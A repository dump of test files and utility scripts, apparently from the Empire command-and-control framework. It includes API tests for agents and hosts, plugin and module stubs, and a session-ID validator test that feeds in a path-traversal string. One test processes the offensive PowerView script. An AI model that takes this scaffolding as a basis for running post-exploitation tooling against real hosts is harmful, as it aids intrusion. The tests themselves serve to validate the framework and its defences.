--------------------------------------------------------------------------------
 1 | import random
 2 | import re
 3 | import string
 4 | 
 5 | SESSION_ID_PATTERN = re.compile(r"^[A-Z0-9]{8}$")
 6 | SLUGIFY_PATTERN = re.compile(r"[/_\-\s]")
 7 | 
 8 | 
 9 | def is_valid_session_id(session_id):
10 |     if not isinstance(session_id, str):
11 |         return False
12 |     return SESSION_ID_PATTERN.match(session_id.strip()) is not None
13 | 
14 | 
15 | def slugify(s: str):
16 |     return SLUGIFY_PATTERN.sub("_", s).lower()
17 | 
18 | 
19 | def get_random_string(length=-1, charset=string.ascii_letters):
20 |     """
21 |     Returns a random string of "length" characters.
22 |     If no length is specified, resulting string is in between 6 and 15 characters.
23 |     A character set can be specified, defaulting to just alpha letters.
24 |     """
25 |     if length == -1:
26 |         length = random.randrange(6, 16)
27 |     return "".join(random.choice(charset) for x in range(length))
28 | 


--------------------------------------------------------------------------------
/empire/test/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/test/__init__.py


--------------------------------------------------------------------------------
/empire/test/avatar.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/test/avatar.png


--------------------------------------------------------------------------------
/empire/test/avatar2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/test/avatar2.png


--------------------------------------------------------------------------------
/empire/test/data/module_source/custom_module_auto_get_source.py:
--------------------------------------------------------------------------------
1 | print("My name is custom_module_auto_get_source.py")
2 | 


--------------------------------------------------------------------------------
/empire/test/data/modules/test_custom_module.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         return "This is the module code."
15 | 


--------------------------------------------------------------------------------
/empire/test/data/modules/test_custom_module.yaml:
--------------------------------------------------------------------------------
 1 | name: Test Custom Module
 2 | authors:
 3 |   - name: Vinnybod
 4 |     handle: ''
 5 |     link: ''
 6 | description: This is for tests.
 7 | software: ''
 8 | techniques:
 9 |   - T1088
10 | background: true
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - Comment
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 | advanced:
24 |   custom_generate: true
25 | 


--------------------------------------------------------------------------------
/empire/test/data/modules/test_custom_module_auto_finalize.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | from empire.server.core.module_service import auto_finalize
 4 | 
 5 | 
 6 | class Module:
 7 |     @staticmethod
 8 |     @auto_finalize
 9 |     def generate(
10 |         main_menu: MainMenu,
11 |         module: EmpireModule,
12 |         params: dict,
13 |         obfuscate: bool = False,
14 |         obfuscation_command: str = "",
15 |     ):
16 |         return "Script", "ScriptEnd"
17 | 


--------------------------------------------------------------------------------
/empire/test/data/modules/test_custom_module_auto_finalize.yaml:
--------------------------------------------------------------------------------
 1 | name: Test Custom Module
 2 | authors:
 3 |   - name: Vinnybod
 4 |     handle: ''
 5 |     link: ''
 6 | description: This is for tests.
 7 | software: ''
 8 | techniques:
 9 |   - T1088
10 | background: true
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - Comment
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 | advanced:
24 |   custom_generate: true
25 | 


--------------------------------------------------------------------------------
/empire/test/data/modules/test_custom_module_auto_get_source.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | from empire.server.core.module_service import auto_get_source
 4 | 
 5 | 
 6 | class Module:
 7 |     @staticmethod
 8 |     @auto_get_source
 9 |     def generate(
10 |         main_menu: MainMenu,
11 |         module: EmpireModule,
12 |         params: dict,
13 |         obfuscate: bool = False,
14 |         obfuscation_command: str = "",
15 |         script: str = "",
16 |     ):
17 |         return script
18 | 


--------------------------------------------------------------------------------
/empire/test/data/modules/test_custom_module_auto_get_source.yaml:
--------------------------------------------------------------------------------
 1 | name: Test Custom Module
 2 | authors:
 3 |   - name: Vinnybod
 4 |     handle: ''
 5 |     link: ''
 6 | description: This is for tests.
 7 | software: ''
 8 | techniques:
 9 |   - T1088
10 | background: true
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: false
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - Comment
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 | script_path: 'custom_module_auto_get_source.py'
24 | advanced:
25 |   custom_generate: true
26 | 


--------------------------------------------------------------------------------
/empire/test/data/whoami.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/test/data/whoami.x64.o


--------------------------------------------------------------------------------
/empire/test/plugin_install/.gitignore:
--------------------------------------------------------------------------------
1 | FooPlugin/
2 | 


--------------------------------------------------------------------------------
/empire/test/plugin_install/FooPluginTemplate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/test/plugin_install/FooPluginTemplate/__init__.py


--------------------------------------------------------------------------------
/empire/test/plugin_install/FooPluginTemplate/foo.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | 
 3 | from empire.server.core.plugins import BasePlugin
 4 | 
 5 | from . import foo_utils
 6 | 
 7 | log = logging.getLogger(__name__)
 8 | 
 9 | foo_utils.bar()
10 | 
11 | 
12 | class Plugin(BasePlugin):
13 |     pass
14 | 


--------------------------------------------------------------------------------
/empire/test/plugin_install/FooPluginTemplate/foo_utils.py:
--------------------------------------------------------------------------------
1 | def bar():
2 |     pass
3 | 


--------------------------------------------------------------------------------
/empire/test/plugin_install/FooPluginTemplate/plugin.yaml:
--------------------------------------------------------------------------------
 1 | name: foo
 2 | authors:
 3 |   - name: Author 1
 4 |     handle: '@author1'
 5 |     link: https://twitter.com/author1
 6 | description: |
 7 |   A description of what the module does and how it works.
 8 | # Software and tools that from the MITRE ATT&CK framework (https://attack.mitre.org/software/)
 9 | software:
10 | # Techniques that from the MITRE ATT&CK framework (https://attack.mitre.org/techniques/enterprise/)
11 | techniques:
12 |   - TXXXX
13 |   - TXXXX
14 | comments:
15 |   - Any additional comments about the module.
16 | # The entry point for the plugin. The file that contains the `Plugin` class.
17 | main: foo.py
18 | auto_start: true
19 | auto_execute:
20 |   enabled: true
21 |   options:
22 |     Status: start
23 |     Message: Hello World!
24 | python_deps:
25 |   - requests>=2.25.1
26 |   - twilio
27 | 


--------------------------------------------------------------------------------
/empire/test/plugin_install/LoadExceptionPlugin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/test/plugin_install/LoadExceptionPlugin/__init__.py


--------------------------------------------------------------------------------
/empire/test/plugin_install/LoadExceptionPlugin/foo.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | from typing import override
 3 | 
 4 | from empire.server.core.plugins import BasePlugin
 5 | 
 6 | log = logging.getLogger(__name__)
 7 | 
 8 | 
 9 | class Plugin(BasePlugin):
10 |     @override
11 |     def on_load(self, db):
12 |         raise Exception("This plugin is meant to fail to load.")
13 | 


--------------------------------------------------------------------------------
/empire/test/plugin_install/LoadExceptionPlugin/plugin.yaml:
--------------------------------------------------------------------------------
 1 | name: LoadExceptionPlugin
 2 | authors:
 3 |   - name: Author 1
 4 |     handle: '@author1'
 5 |     link: https://twitter.com/author1
 6 | description: |
 7 |   A description of what the module does and how it works.
 8 | # Software and tools that from the MITRE ATT&CK framework (https://attack.mitre.org/software/)
 9 | software:
10 | # Techniques that from the MITRE ATT&CK framework (https://attack.mitre.org/techniques/enterprise/)
11 | techniques:
12 |   - TXXXX
13 |   - TXXXX
14 | comments:
15 |   - Any additional comments about the module.
16 | # The entry point for the plugin. The file that contains the `Plugin` class.
17 | main: foo.py
18 | auto_start: true
19 | auto_execute:
20 |   enabled: true
21 |   options:
22 |     Status: start
23 |     Message: Hello World!
24 | python_deps:
25 |   - requests>=2.25.1
26 |   - twilio
27 | 


--------------------------------------------------------------------------------
/empire/test/plugin_install/marketplace/.gitignore:
--------------------------------------------------------------------------------
1 | *
2 | !.gitignore
3 | 


--------------------------------------------------------------------------------
/empire/test/test-upload-2.yaml:
--------------------------------------------------------------------------------
1 | this: is a test file for uploads
2 | okay: true
3 | 


--------------------------------------------------------------------------------
/empire/test/test-upload.yaml:
--------------------------------------------------------------------------------
1 | this: is a test file for uploads
2 | okay: true
3 | 


--------------------------------------------------------------------------------
/empire/test/test_admin_api.py:
--------------------------------------------------------------------------------
 1 | import pytest
 2 | from starlette.status import HTTP_200_OK
 3 | 
 4 | 
 5 | @pytest.fixture(scope="module", autouse=True)
 6 | def _set_ip_filtering(main):
 7 |     main.ipsv2.ip_filtering = False
 8 |     yield
 9 |     main.ipsv2.ip_filtering = True
10 | 
11 | 
12 | def test_toggle_ip_filtering(client, admin_auth_header, main):
13 |     resp = client.put(
14 |         "/api/v2/admin/ip_filtering?enabled=true",
15 |         headers=admin_auth_header,
16 |     )
17 | 
18 |     assert resp.status_code == HTTP_200_OK
19 |     assert main.ipsv2.ip_filtering is True
20 | 
21 |     resp = client.put(
22 |         "/api/v2/admin/ip_filtering?enabled=false",
23 |         headers=admin_auth_header,
24 |     )
25 | 
26 |     assert resp.status_code == HTTP_200_OK
27 |     assert main.ipsv2.ip_filtering is False
28 | 


--------------------------------------------------------------------------------
/empire/test/test_agent_service.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | 
 3 | import pytest
 4 | 
 5 | from empire.server.common.empire import MainMenu
 6 | 
 7 | 
 8 | @pytest.fixture(scope="module")
 9 | def agent_service(main: MainMenu):
10 |     return main.agentsv2
11 | 
12 | 
13 | def test_save_agent_log(agent_service, agent, empire_config):
14 |     agent_service.save_agent_log(agent, "test log 1 string")
15 | 
16 |     agent_service.save_agent_log(agent, b"test log 2 bytes")
17 | 
18 |     path = empire_config.directories.downloads / agent / "agent.log"
19 | 
20 |     text = path.read_text().split("\n")
21 |     text = text[text.index("test log 1 string") - 1 :]
22 | 
23 |     assert re.match(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} : $", text[0])
24 |     assert text[1] == "test log 1 string"
25 | 
26 |     assert re.match(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} : $", text[3])
27 |     assert text[4] == "test log 2 bytes"
28 | 


--------------------------------------------------------------------------------
/empire/test/test_agent_task_service.py:
--------------------------------------------------------------------------------
 1 | def test_create_task_no_user_id(client, session_local, agent, main, models):
 2 |     with session_local.begin() as db:
 3 |         db_agent = (
 4 |             db.query(models.Agent).filter(models.Agent.session_id == agent).first()
 5 |         )
 6 |         resp, err = main.agenttasksv2.create_task_shell(
 7 |             db, db_agent, "echo 'hi'", True, 0
 8 |         )
 9 | 
10 |         assert err is None
11 |         assert resp.user_id is None
12 |         assert resp.user is None
13 | 


--------------------------------------------------------------------------------
/empire/test/test_common_agents.py:
--------------------------------------------------------------------------------
 1 | from starlette import status
 2 | 
 3 | 
 4 | def test_agent_logging(client, admin_auth_header, agent, empire_config):
 5 |     """
 6 |     Test that the agent logs to the agent log file.
 7 |     This is super basic and could be expanded later to test responses.
 8 |     """
 9 |     response = client.post(
10 |         f"/api/v2/agents/{agent}/tasks/shell",
11 |         headers=admin_auth_header,
12 |         json={
13 |             "command": 'echo "Hello World!"',
14 |         },
15 |     )
16 | 
17 |     assert response.status_code == status.HTTP_201_CREATED
18 | 
19 |     agent_log_file = empire_config.directories.downloads / agent / "agent.log"
20 |     assert agent_log_file.exists()
21 |     assert f"Tasked {agent} to run TASK_SHELL" in agent_log_file.read_text()
22 | 


--------------------------------------------------------------------------------
/empire/test/test_helpers.py:
--------------------------------------------------------------------------------
 1 | from pathlib import Path
 2 | 
 3 | from empire.server.common import helpers
 4 | 
 5 | 
 6 | def test_dynamic_powershell(install_path):
 7 |     expected_len = 96863
 8 | 
 9 |     with (
10 |         Path(install_path)
11 |         / "data/module_source/situational_awareness/network/powerview.ps1"
12 |     ).open() as file:
13 |         script = file.read()
14 |         new_script = helpers.generate_dynamic_powershell_script(
15 |             script, "Find-LocalAdminAccess"
16 |         )
17 |     assert len(new_script) == expected_len
18 | 


--------------------------------------------------------------------------------
/empire/test/test_host_api.py:
--------------------------------------------------------------------------------
 1 | from starlette import status
 2 | 
 3 | 
 4 | def test_get_host_not_found(client, admin_auth_header):
 5 |     response = client.get("/api/v2/hosts/9999", headers=admin_auth_header)
 6 | 
 7 |     assert response.status_code == status.HTTP_404_NOT_FOUND
 8 |     assert response.json()["detail"] == "Host not found for id 9999"
 9 | 
10 | 
11 | def test_get_host(client, host, admin_auth_token, admin_auth_header):
12 |     response = client.get(f"/api/v2/hosts/{host}", headers=admin_auth_header)
13 | 
14 |     assert response.status_code == status.HTTP_200_OK
15 |     assert response.json()["id"] == host
16 | 
17 | 
18 | def test_get_hosts(client, host, admin_auth_header):
19 |     response = client.get("/api/v2/hosts", headers=admin_auth_header)
20 | 
21 |     assert response.status_code == status.HTTP_200_OK
22 |     assert len(response.json()["records"]) > 0
23 | 


--------------------------------------------------------------------------------
/empire/test/test_meta_api.py:
--------------------------------------------------------------------------------
 1 | from starlette import status
 2 | 
 3 | 
 4 | def test_version(client, admin_auth_header):
 5 |     import empire.server.common.empire
 6 | 
 7 |     response = client.get("/api/v2/meta/version", headers=admin_auth_header)
 8 |     assert response.status_code == status.HTTP_200_OK
 9 |     assert (
10 |         response.json()["version"] == empire.server.common.empire.VERSION.split(" ")[0]
11 |     )
12 | 


--------------------------------------------------------------------------------
/empire/test/test_openapi.py:
--------------------------------------------------------------------------------
1 | from starlette import status
2 | 
3 | 
4 | def test_openapi(client):
5 |     response = client.get("/openapi.json")
6 |     print(response.json())
7 |     assert response.status_code == status.HTTP_200_OK
8 |     assert response.json()["openapi"] == "3.1.0"
9 | 


--------------------------------------------------------------------------------
/empire/test/test_registry_1.yaml:
--------------------------------------------------------------------------------
 1 | schema_version: 1
 2 | plugins:
 3 |   - name: slack
 4 |     homepage_url: https://github.com/bc-security/slack-plugin
 5 |     source_url: https://github.com/bc-security/slack-plugin
 6 |     authors:
 7 |       - name: Example
 8 |         handle: "@Example"
 9 |         link: github.com/example
10 |     description: |
11 |       Slack
12 |       ---
13 | 
14 |       This is a plugin that allows you to interact with Slack.
15 | 
16 |       # This Description supports markdown
17 |     versions:
18 |       - name: main
19 |         git_url: https://github.com/bc-security/slack-plugin
20 |         ref: main
21 |         subdirectory:
22 |       - name: 1.0.0
23 |         git_url: https://github.com/bc-security/slack-plugin
24 |         ref: v1.0.0
25 |         subdirectory:
26 |       - name: 1.0.1
27 |         git_url: https://github.com/bc-security/slack-plugin
28 |         ref: v1.0.1
29 |         subdirectory:
30 | 


--------------------------------------------------------------------------------
/empire/test/test_registry_2.yaml:
--------------------------------------------------------------------------------
 1 | schema_version: 1
 2 | plugins:
 3 |   - name: slack
 4 |     homepage_url: https://github.com/bc-security/slack-plugin
 5 |     source_url: https://github.com/bc-security/slack-plugin
 6 |     authors:
 7 |       - name: Example
 8 |         handle: "@Example"
 9 |         link: github.com/example
10 |     description: |
11 |       Slack
12 |       ---
13 | 
14 |       This is a plugin that allows you to interact with Slack.
15 | 
16 |       # This Description supports markdown
17 |     versions:
18 |       - name: 1.0.0
19 |         tar_url: https://github.com/bc-security/slack-other/releases/download/v1.0.0/slack.tar.gz
20 |         # TODO: checksum ?
21 |         subdirectory:
22 |       - name: 1.0.1
23 |         tar_url: https://github.com/bc-security/slack-other/releases/download/v1.0.1/slack.tar.gz
24 |         subdirectory:
25 |       - name: 2.0.0
26 |         tar_url: https://github.com/bc-security/slack-other/releases/download/v2.0.0/slack.tar.gz
27 |         subdirectory:
28 | 


--------------------------------------------------------------------------------
/empire/test/test_socket_hooks.py:
--------------------------------------------------------------------------------
1 | # https://github.com/miguelgrinberg/python-socketio/issues/332
2 | def test_create_listener_socket_message():
3 |     pass
4 | 
5 | 
6 | def test_agent_checkin_socket_message():
7 |     pass
8 | 


--------------------------------------------------------------------------------
/empire/test/test_string_util.py:
--------------------------------------------------------------------------------
 1 | import pytest
 2 | 
 3 | from empire.server.utils.string_util import is_valid_session_id, slugify
 4 | 
 5 | 
 6 | @pytest.mark.parametrize(
 7 |     ("session_id", "expected"),
 8 |     [
 9 |         ("ABCDEFGH", True),
10 |         ("12345678", True),
11 |         ("ABCDEF1H", True),
12 |         ("A1B2C3D4", True),
13 |         ("ABCDEFG", False),
14 |         ("ABCDEFGHI", False),
15 |         ("ABCD_EFG", False),
16 |         ("       ", False),
17 |         ("", False),
18 |         (12345678, False),
19 |         (None, False),
20 |         ("./../../", False),
21 |     ],
22 | )
23 | def test_is_valid_session_id(session_id, expected):
24 |     assert is_valid_session_id(session_id) == expected, (
25 |         f"Test failed for session_id: {session_id}"
26 |     )
27 | 
28 | 
29 | def test_slugify():
30 |     assert (
31 |         slugify("this/has invalid_characters-in\tstring")
32 |         == "this_has_invalid_characters_in_string"
33 |     )
34 | 


--------------------------------------------------------------------------------
/ps-empire:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | INSTALL=0
 4 | YES_OPTION=""
 5 | FORCE_OPTION=""
 6 | EMPIRE_ARGS=()
 7 | 
 8 | for arg in "$@"; do
 9 |   case $arg in
10 |     install)
11 |       INSTALL=1
12 |       ;;
13 |     -y)
14 |       YES_OPTION="-y"
15 |       ;;
16 |     -f)
17 |       FORCE_OPTION="-f"
18 |       ;;
19 |     -h)
20 |       SHOW_HELP="-h"
21 |       ;;
22 |     *)
23 |       EMPIRE_ARGS+=("$arg")
24 |       ;;
25 |   esac
26 | done
27 | 
28 | if [ $INSTALL -eq 1 ]; then
29 |   ./setup/install.sh $SHOW_HELP $YES_OPTION $FORCE_OPTION
30 | fi
31 | 
32 | if [ "$EUID" -eq 0 ] && [ -z "$FORCE_OPTION" ]; then
33 |     exit 1
34 | fi
35 | 
36 | if [ $INSTALL -eq 0 ]; then
37 |     sudo -E poetry run python empire.py "${EMPIRE_ARGS[@]}"
38 | fi
39 | 


--------------------------------------------------------------------------------
/pytest.ini:
--------------------------------------------------------------------------------
 1 | [pytest]
 2 | log_cli = false
 3 | log_cli_level = INFO
 4 | # Should figure out a better way to do this, but for now filters out all the
 5 | # warnings from the threads exiting.
 6 | filterwarnings =
 7 |     ignore::pytest.PytestUnhandledThreadExceptionWarning
 8 | env =
 9 |     TEST_MODE=true
10 | 


--------------------------------------------------------------------------------
/setup/cert.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | path=$1
4 | 
5 | openssl req -new -x509 -keyout "${path}/empire-priv.key" -out "${path}/empire-chain.pem" -days 365 -nodes -subj "/C=US" >/dev/null 2>&1
6 | 
7 | echo -e "\x1b[1;34m[*] Certificate written to ${path}/empire-chain.pem\x1b[0m"
8 | echo -e "\x1b[1;34m[*] Private key written to ${path}/empire-priv.key\x1b[0m"
9 | 


--------------------------------------------------------------------------------
/setup/checkout-latest-tag.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # Get git tags matching semver
 3 | # remove the -beta -alpha -rc suffixes with grep
 4 | tags=$(git tag --list --sort=-version:refname "v*.*.*")
 5 | 
 6 | # If prerelease arg is not passed, filter out prerelease tags
 7 | if [ "$1" != "pre" ] && [ "$2" != "pre" ]; then
 8 |   tags=$(echo "$tags" | grep -v -E "beta|alpha|rc|RC")
 9 | fi
10 | 
11 | # If sponsors arg is passed, only show tags with sponsors
12 | if [[ "$1" == "sponsor"* ]] || [[ "$2" == "sponsor"* ]]; then
13 |   tags=$(echo "$tags" | grep -E "sponsors")
14 | fi
15 | 
16 | # If kali arg is passed, only show tags with kali
17 | if [ "$1" == "kali" ] || [ "$2" == "kali" ]; then
18 |   tags=$(echo "$tags" | grep -E "kali")
19 | fi
20 | 
21 | # get latest tag
22 | latest_tag=$(echo "$tags" | head -n 1)
23 | 
24 | echo "Checkout out latest tag: $latest_tag"
25 | git checkout "$latest_tag"
26 | 


--------------------------------------------------------------------------------